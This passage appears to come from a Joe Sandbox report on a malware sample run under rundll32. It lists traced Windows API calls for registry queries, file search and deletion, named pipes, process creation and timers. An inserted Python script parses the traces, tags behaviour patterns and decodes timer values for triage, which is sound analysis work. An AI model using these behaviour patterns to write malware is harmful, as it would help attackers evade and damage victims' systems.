                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 0593E82F
                                • Part of subcall function 0594EA15: lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA40
                                • Part of subcall function 0594EA15: lstrlen.KERNEL32(?,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA48
                                • Part of subcall function 0594EA15: strcpy.NTDLL ref: 0594EA5F
                                • Part of subcall function 0594EA15: lstrcat.KERNEL32(00000000,?), ref: 0594EA6A
                                • Part of subcall function 0594EA15: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA87
                              • StrTrimA.SHLWAPI(00000000,059553E8,00000000,05F3C310), ref: 0593E864
                                • Part of subcall function 05938DC7: lstrlen.KERNEL32(05F38560,76C85520,76CC81D0,773BEEF0,0593E873,?), ref: 05938DD7
                                • Part of subcall function 05938DC7: lstrlen.KERNEL32(?), ref: 05938DDF
                                • Part of subcall function 05938DC7: lstrcpy.KERNEL32(00000000,05F38560), ref: 05938DF3
                                • Part of subcall function 05938DC7: lstrcat.KERNEL32(00000000,?), ref: 05938DFE
                              • lstrcpy.KERNEL32(?,?), ref: 0593E88D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0593E897
                              • lstrcat.KERNEL32(00000000,?), ref: 0593E8A2
                              • lstrcat.KERNEL32(00000000,?), ref: 0593E8A9
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 0593E8B4
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 0593E8D0
                                • Part of subcall function 05937DF5: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,05945583,00000000,00000000), ref: 05937E46
                                • Part of subcall function 05937DF5: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 05937ED9
                              • HeapFree.KERNEL32(00000000,?,00000001,05F3C310,?,?,?), ref: 0593E997
                              • HeapFree.KERNEL32(00000000,?,?), ref: 0593E9AF
                              • HeapFree.KERNEL32(00000000,?,00000000,05F3C310), ref: 0593E9BD
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593E9CB
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593E9D6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                              • String ID:
                              • API String ID: 4032678529-0
                              • Opcode ID: b4bda0fb78cdb9564b1a525a67fd3b0a08d9970106ab6629d807be1bc6c18aa5
                              • Instruction ID: b6bad0d4e5954d368f7c6ce1be0fea4673c8f6f8c717b95f3b462871bca5e9f0
                              • Opcode Fuzzy Hash: b4bda0fb78cdb9564b1a525a67fd3b0a08d9970106ab6629d807be1bc6c18aa5
                              • Instruction Fuzzy Hash: 7CB14671118301EFDB01DFA8DC86E2ABBE9FB88314F050928F649D7261DB35E825CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32 ref: 0594CED3
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0594CEEF
                              • GetLastError.KERNEL32 ref: 0594CF3E
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594CF54
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0594CF68
                              • GetLastError.KERNEL32 ref: 0594CF82
                              • GetLastError.KERNEL32 ref: 0594CFB5
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594CFD3
                              • lstrlenW.KERNEL32(00000000,?), ref: 0594CFFF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0594D014
                              • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 0594D0E8
                              • HeapFree.KERNEL32(00000000,?), ref: 0594D0F7
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0594D10C
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594D11F
                              • HeapFree.KERNEL32(00000000,?), ref: 0594D131
                              • RtlExitUserThread.NTDLL(?,?), ref: 0594D146
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                              • String ID:
                              • API String ID: 3853681310-3916222277
                              • Opcode ID: f4524603ee3010ce5578f4d38eda2d6d30491a20f41ca228e54eb53ccea64b5f
                              • Instruction ID: 62842abf6d9cec791b430c38ef45a1e85711cfbe61f1e5fe0fe9b21db967f05a
                              • Opcode Fuzzy Hash: f4524603ee3010ce5578f4d38eda2d6d30491a20f41ca228e54eb53ccea64b5f
                              • Instruction Fuzzy Hash: 2181137191420AEFDB109FA4DD89EAEBFBDFB09201F010469F906A3250DB349D69DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05947F9B
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 05947FB8
                              • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05948008
                              • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 05948012
                              • GetLastError.KERNEL32 ref: 0594801C
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594802D
                              • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0594804F
                              • HeapFree.KERNEL32(00000000,?), ref: 05948086
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0594809A
                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 059480A3
                              • SuspendThread.KERNEL32(?), ref: 059480B2
                              • CreateEventA.KERNEL32(0595A1E8,00000001,00000000), ref: 059480C6
                              • SetEvent.KERNEL32(00000000), ref: 059480D3
                              • CloseHandle.KERNEL32(00000000), ref: 059480DA
                              • Sleep.KERNEL32(000001F4), ref: 059480ED
                              • ResumeThread.KERNEL32(?), ref: 05948111
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                              • String ID: v
                              • API String ID: 1011176505-1801730948
                              • Opcode ID: ac753c97af96eadff163cb631c2d97b862b6dbab2e313af5edc4143f191c4356
                              • Instruction ID: bdd1a494d45a8171c49c01acc4675b25c8cf7ffd863454669e92bbe01978f2ae
                              • Opcode Fuzzy Hash: ac753c97af96eadff163cb631c2d97b862b6dbab2e313af5edc4143f191c4356
                              • Instruction Fuzzy Hash: 71416A72928209EFDB109FA0EC8ADBEBFB9FB04301B154569F606A2111DB315DA5DF90
                              Uniqueness

                              Uniqueness Score: -1.00%
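The two listings above (the waitable-timer loop at refs 05933860 to 05933D41, and the DeleteFileW / SuspendThread / ResumeThread function at refs 05947F9B to 05948111) are easier to triage in bulk when the trace lines are parsed rather than read by hand. The following Python is an added example written for this page, not Joe Sandbox code: it parses the `• API.MODULE(args), ref: ADDR` line shape used in these listings (including the indented `Part of subcall function` lines), collects the API set per function, matches it against a small table of triage labels that are heuristics chosen for this example rather than sandbox signatures, and decodes a 64-bit SetWaitableTimer due time. The embedded sample lines are copied from the listings above. The pair lo=FF676980 / hi=FFFFFFFF used in the decode is an assumption: the trace prints `000000FF` in the neighbouring slot, and this argument display is a heuristic stack snapshot, so the one-second reading should be confirmed in a debugger before it is relied on.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# One line of a Joe Sandbox "APIs" listing. Handles the three shapes seen on
# this page:
#   • SetWaitableTimer.KERNEL32(00000000,?,00000000), ref: 05933AD2
#   • GetTickCount.KERNEL32 ref: 0594F1FF                 (no argument list)
#   • Part of subcall function 0593A976: GetLastError.KERNEL32(?), ref: 0593A9BE
_LINE = re.compile(
    r"(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw hex tokens as printed, "?" when unknown
    ref: int                   # address of the call instruction
    subcall_of: Optional[int]  # callee address for indented subcall lines


def parse_api_trace(text: str) -> List[ApiCall]:
    """Parse every recognisable API line; lines of any other shape are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def api_names(calls: List[ApiCall], include_subcalls: bool = True) -> Set[str]:
    return {c.api for c in calls if include_subcalls or c.subcall_of is None}


def count_by_api(calls: List[ApiCall]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for c in calls:
        counts[c.api] = counts.get(c.api, 0) + 1
    return counts


# Triage heuristics made up for this example (the labels are mine, not Joe
# Sandbox signatures): a label applies when every listed API occurs in the function.
PATTERNS: Dict[str, Set[str]] = {
    "timer-driven wait loop": {"SetWaitableTimer", "WaitForMultipleObjects", "_allmul"},
    "thread-stalled file delete": {"SuspendThread", "DeleteFileW", "ResumeThread"},
}


def match_patterns(calls: List[ApiCall]) -> List[str]:
    names = api_names(calls)
    return sorted(label for label, needed in PATTERNS.items() if needed <= names)


def relative_filetime_seconds(lo: int, hi: int) -> float:
    """Decode a LARGE_INTEGER due time the way SetWaitableTimer reads it: the
    value is in 100 ns units, and a negative value means 'relative to now'."""
    v = (hi << 32) | lo
    if v & (1 << 63):
        v -= 1 << 64
    return v / 10_000_000


def sleep_durations_ms(calls: List[ApiCall]) -> List[int]:
    """Millisecond argument of every Sleep() call whose first argument is known."""
    return [int(c.args[0], 16) for c in calls
            if c.api == "Sleep" and c.args and c.args[0] != "?"]


# Constructed samples: lines copied from the two listings discussed above.
SAMPLE_TIMER_FUNC = """\
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 059338C3
  • Part of subcall function 0593A976: CreateWaitableTimerA.KERNEL32(0595A1E8,00000001,?), ref: 0593A9AD
• _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05933AB8
• SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05933AD2
• _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 05933B1A
• SwitchToThread.KERNEL32 ref: 05933BD7
• RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 05933D41
"""

SAMPLE_DELETE_FUNC = """\
• DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 05948012
• SuspendThread.KERNEL32(?), ref: 059480B2
• Sleep.KERNEL32(000001F4), ref: 059480ED
• ResumeThread.KERNEL32(?), ref: 05948111
"""

if __name__ == "__main__":
    for label, text in (("timer function", SAMPLE_TIMER_FUNC),
                        ("delete function", SAMPLE_DELETE_FUNC)):
        calls = parse_api_trace(text)
        print(label, sorted(api_names(calls)), match_patterns(calls))
    # Assumed 64-bit pair for the _allmul/SetWaitableTimer constant above.
    print(relative_filetime_seconds(0xFF676980, 0xFFFFFFFF))
```

Because SetWaitableTimer treats a negative due time as relative in 100 ns units, -10,000,000 decodes to one second. The second `_allmul` call in the listing multiplies by `0000003C` (60), which under the same assumption would give a one-minute timer; that is an inference from the argument order, not something the report states.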

                              APIs
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 05932CA9
                              • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 05932CC7
                              • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 05932CF3
                              • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 05932D62
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05932DDA
                              • wsprintfA.USER32 ref: 05932DF6
                              • lstrlen.KERNEL32(00000000,00000000), ref: 05932E01
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05932E18
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05932EA4
                              • wsprintfA.USER32 ref: 05932EBF
                              • lstrlen.KERNEL32(00000000,00000000), ref: 05932ECA
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05932EE1
                              • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,?,?,?), ref: 05932F03
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05932F1E
                              • wsprintfA.USER32 ref: 05932F35
                              • lstrlen.KERNEL32(00000000,00000000), ref: 05932F40
                                • Part of subcall function 05933172: lstrlen.KERNEL32(059343C6,00000000,?,?,?,?,059343C6,00000035,00000000,?,00000000), ref: 059331A2
                                • Part of subcall function 05933172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 059331B8
                                • Part of subcall function 05933172: memcpy.NTDLL(00000010,059343C6,00000000,?,?,059343C6,00000035,00000000), ref: 059331EE
                                • Part of subcall function 05933172: memcpy.NTDLL(00000010,00000000,00000035,?,?,059343C6,00000035), ref: 05933209
                                • Part of subcall function 05933172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05933227
                                • Part of subcall function 05933172: GetLastError.KERNEL32(?,?,059343C6,00000035), ref: 05933231
                                • Part of subcall function 05933172: HeapFree.KERNEL32(00000000,00000000,?,?,059343C6,00000035), ref: 05933254
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05932F57
                              • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,05F38A20), ref: 05932F83
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                              • String ID:
                              • API String ID: 3130754786-0
                              • Opcode ID: 77844a953cc03e74c30a9d9a3a2d565ec52dc5331f432229310988af70b91800
                              • Instruction ID: a933275d9332168cad26bcb9f8684a8a7aa6fb33919e98bfe9afd87ae4b7e7bb
                              • Opcode Fuzzy Hash: 77844a953cc03e74c30a9d9a3a2d565ec52dc5331f432229310988af70b91800
                              • Instruction Fuzzy Hash: E0A169B5914209EFDF219FA4DC8ADBEBBBEFB48305B014529F505A2210CB345D69DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?), ref: 059411AA
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0594BB1D
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0594BB29
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BB71
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BB8C
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BBC4
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?), ref: 0594BBCC
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BBEF
                                • Part of subcall function 0594BAD1: wcscpy.NTDLL ref: 0594BC01
                                • Part of subcall function 0594BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0594BC27
                                • Part of subcall function 0594BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0594BC5D
                                • Part of subcall function 0594BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0594BC79
                                • Part of subcall function 0594BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0594BC92
                                • Part of subcall function 0594BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0594BCA4
                                • Part of subcall function 0594BAD1: FindClose.KERNEL32(?), ref: 0594BCB9
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BCCD
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BCEF
                              • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 05941206
                              • memcpy.NTDLL(00000000,?,00000000), ref: 05941219
                              • lstrcpyW.KERNEL32(00000000,?), ref: 05941230
                                • Part of subcall function 0594BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0594BD65
                                • Part of subcall function 0594BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0594BD77
                                • Part of subcall function 0594BAD1: FindClose.KERNEL32(?), ref: 0594BD92
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0594125B
                              • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 05941273
                              • HeapFree.KERNEL32(00000000,00000000), ref: 059412CD
                              • lstrlenW.KERNEL32(00000000,?), ref: 059412F0
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05941302
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 05941376
                              • HeapFree.KERNEL32(00000000,?), ref: 05941386
                                • Part of subcall function 0593AE7C: lstrlen.KERNEL32(0593E448,00000000,00000000,?,?,05947A5B,?,?,?,?,0593E448,?), ref: 0593AE8B
                                • Part of subcall function 0593AE7C: mbstowcs.NTDLL ref: 0593AEA7
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 059413AF
                              • lstrlenW.KERNEL32(0595B878,?), ref: 05941429
                              • DeleteFileW.KERNEL32(?,?), ref: 05941457
                              • HeapFree.KERNEL32(00000000,?), ref: 05941465
                              • HeapFree.KERNEL32(00000000,?), ref: 05941486
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                              • String ID:
                              • API String ID: 72361108-0
                              • Opcode ID: bebe5695c99eb014b45c7e848629e0b51d64788fe0411baff6f1e2b9d8ca9eff
                              • Instruction ID: f8a68c48b5cfac565a6c284ffcbb2bae354c3911e69c5872b0dbb836d39a0a1a
                              • Opcode Fuzzy Hash: bebe5695c99eb014b45c7e848629e0b51d64788fe0411baff6f1e2b9d8ca9eff
                              • Instruction Fuzzy Hash: 789137B151421ABFCB10DFA4DC89CAABFBDFB49351B444415F60AC7111EB34A9A8DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memset.NTDLL ref: 05935465
                              • StrChrA.SHLWAPI(?,0000000D), ref: 059354AB
                              • StrChrA.SHLWAPI(?,0000000A), ref: 059354B8
                              • StrChrA.SHLWAPI(?,0000007C), ref: 059354DF
                              • StrTrimA.SHLWAPI(?,05955FCC), ref: 059354F4
                              • StrChrA.SHLWAPI(?,0000003D), ref: 059354FD
                              • StrTrimA.SHLWAPI(00000001,05955FCC), ref: 05935513
                              • _strupr.NTDLL ref: 0593551A
                              • StrTrimA.SHLWAPI(?,?), ref: 05935527
                              • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 0593556F
                              • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 0593558E
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                              • String ID: $;
                              • API String ID: 4019332941-73438061
                              • Opcode ID: b68bcaa3918092efd41a7ea763ae42001270bc1710e7e1c25fcd4598d44ede16
                              • Instruction ID: 4cd250e9e74badceb70d79ca35cc96e3dab09c5b50ba4faad3b834f438020f8b
                              • Opcode Fuzzy Hash: b68bcaa3918092efd41a7ea763ae42001270bc1710e7e1c25fcd4598d44ede16
                              • Instruction Fuzzy Hash: FE41A271608306DFD711DF28C84AB1BBBEDFF89640F054819F89ADB241DB74E9058B62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • wsprintfA.USER32 ref: 05942DF8
                              • OpenWaitableTimerA.KERNEL32(00100000,00000000,00000000), ref: 05942E0C
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,?), ref: 05942F37
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memset.NTDLL ref: 05942E38
                              • GetLastError.KERNEL32(?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05942E70
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
                              • String ID: 0x%08X$W
                              • API String ID: 95801598-2600449260
                              • Opcode ID: 9cd9e74db4f1e5312e65ecd9d8bef9a40a8991214dc90edf7861472ef421692c
                              • Instruction ID: 5fd97b7a64379573b16ae8ab0392ecb7cea84c17aa77fccfcc3ad085ce13e946
                              • Opcode Fuzzy Hash: 9cd9e74db4f1e5312e65ecd9d8bef9a40a8991214dc90edf7861472ef421692c
                              • Instruction Fuzzy Hash: 565159B4504309AFDB21DF65C849FAABBE8FF08754F108519F949D6280D7B4EA54CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0594C034
                                • Part of subcall function 0593AE7C: lstrlen.KERNEL32(0593E448,00000000,00000000,?,?,05947A5B,?,?,?,?,0593E448,?), ref: 0593AE8B
                                • Part of subcall function 0593AE7C: mbstowcs.NTDLL ref: 0593AEA7
                              • lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0594C06D
                              • wcstombs.NTDLL ref: 0594C077
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0594C0A8
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0D4
                              • TerminateProcess.KERNEL32(?,000003E5), ref: 0594C0EA
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0FE
                              • GetLastError.KERNEL32 ref: 0594C102
                              • GetExitCodeProcess.KERNEL32(?,00000001), ref: 0594C122
                              • CloseHandle.KERNEL32(?), ref: 0594C131
                              • CloseHandle.KERNEL32(?), ref: 0594C136
                              • GetLastError.KERNEL32 ref: 0594C13A
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                              • String ID: D
                              • API String ID: 2463014471-2746444292
                              • Opcode ID: 1640d1fe5e6e1582041e3e61e7f12dd37b2a0099de9d8f25ebbd17004a0a306b
                              • Instruction ID: ca9e68e759aebcc546c32bab2e261c3432394de49a986f02ca68b51def2d1e36
                              • Opcode Fuzzy Hash: 1640d1fe5e6e1582041e3e61e7f12dd37b2a0099de9d8f25ebbd17004a0a306b
                              • Instruction Fuzzy Hash: 6D41E6B1905218BFDB11EFA4CE89DAEBBBDFB48344F214469E505B6100EB719E148F61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05934526
                              • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05934545
                              • GetLastError.KERNEL32 ref: 059346F6
                              • GetLastError.KERNEL32 ref: 05934778
                              • SwitchToThread.KERNEL32(?,?,?,?), ref: 059347C1
                              • GetLastError.KERNEL32 ref: 05934813
                              • GetLastError.KERNEL32 ref: 05934822
                              • RtlEnterCriticalSection.NTDLL(?), ref: 05934832
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 05934843
                              • RtlExitUserThread.NTDLL(?), ref: 05934851
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 059348C0
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05934911
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 05934946
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 05934956
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorHeapLast$AllocAllocateCriticalFreeSectionThreadVirtual$EnterExitLeaveSwitchUser
                              • String ID:
                              • API String ID: 2794784202-0
                              • Opcode ID: 2a5ea98ed27d6f1b28c9593091d70487967b61ed0a3227d1d13ca90f2da36c75
                              • Instruction ID: e2661e2bf1d44b95dbbd5b6cbd7b4be1e31cc6ba373cf1aa8b6e211d868eada9
                              • Opcode Fuzzy Hash: 2a5ea98ed27d6f1b28c9593091d70487967b61ed0a3227d1d13ca90f2da36c75
                              • Instruction Fuzzy Hash: 57E15CB1504249EFEF209F65CC8AEAABBBEFF08304F114529F91AD2151EB709954CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0593C03F
                              • StrTrimA.SHLWAPI(00000001,?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0593C058
                              • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0593C063
                              • StrTrimA.SHLWAPI(00000001,?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0593C07C
                              • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?), ref: 0593C11F
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0593C141
                              • lstrcpy.KERNEL32(00000020,?), ref: 0593C160
                              • lstrlen.KERNEL32(?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?,00000000), ref: 0593C16A
                              • memcpy.NTDLL(?,?,?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0593C1AB
                              • memcpy.NTDLL(?,?,?,?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001), ref: 0593C1BE
                              • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057), ref: 0593C1E2
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,059485F1,?,00000000,0000001E), ref: 0593C201
                              • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?), ref: 0593C227
